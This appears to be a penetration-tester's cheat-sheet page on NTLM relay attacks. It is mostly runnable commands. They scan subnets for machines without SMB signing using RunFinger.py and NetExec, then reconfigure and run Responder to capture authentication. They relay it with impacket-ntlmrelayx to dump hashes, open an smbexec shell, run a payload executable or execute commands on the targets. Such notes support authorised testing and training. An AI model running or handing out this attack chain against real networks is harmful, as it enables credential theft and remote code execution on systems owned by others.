Skip to content

Relay Attacks

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

Relay captures hashes to target machine for various types of access. - Only works if SMB signing is disabled or "not required" - Relayed creds MUST be admin on the machine

Identifying Relay Targets

Automated

RunFinger.py included with Responder can scan the network for potential relay targets for:

  • SMB
  • MSSQL
  • RDP
python3 RunFinger.py -i 192.168.1.0/24

NetExec will automatically generate a list of targets with --gen-relay-list for:

  • SMB
nxc smb 192.168.1.0/24 --gen-relay-list output.txt

ntlmrelayx

Responder + ntlmrelayx

Edit responder conf: 

sudo nano /etc/responder/Responder.conf
SMB = On ---> Off
HTTP = on ---> Off
Make targets list 
echo "<TargetIP>" > targets.txt
Run responder 
sudo responder -I eth0 -wv
Start ntlmrelayx with any of these options

Dump hashes 

sudo impacket-ntlmrelayx -tf targets.txt -smb2support
Get semi-interactive smbexec bind shell (nc localhost 11000) 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i
Execute payload 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe
Execute Command 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -c 'whoami'
Wait for auth attempt (or coerce auth attempt)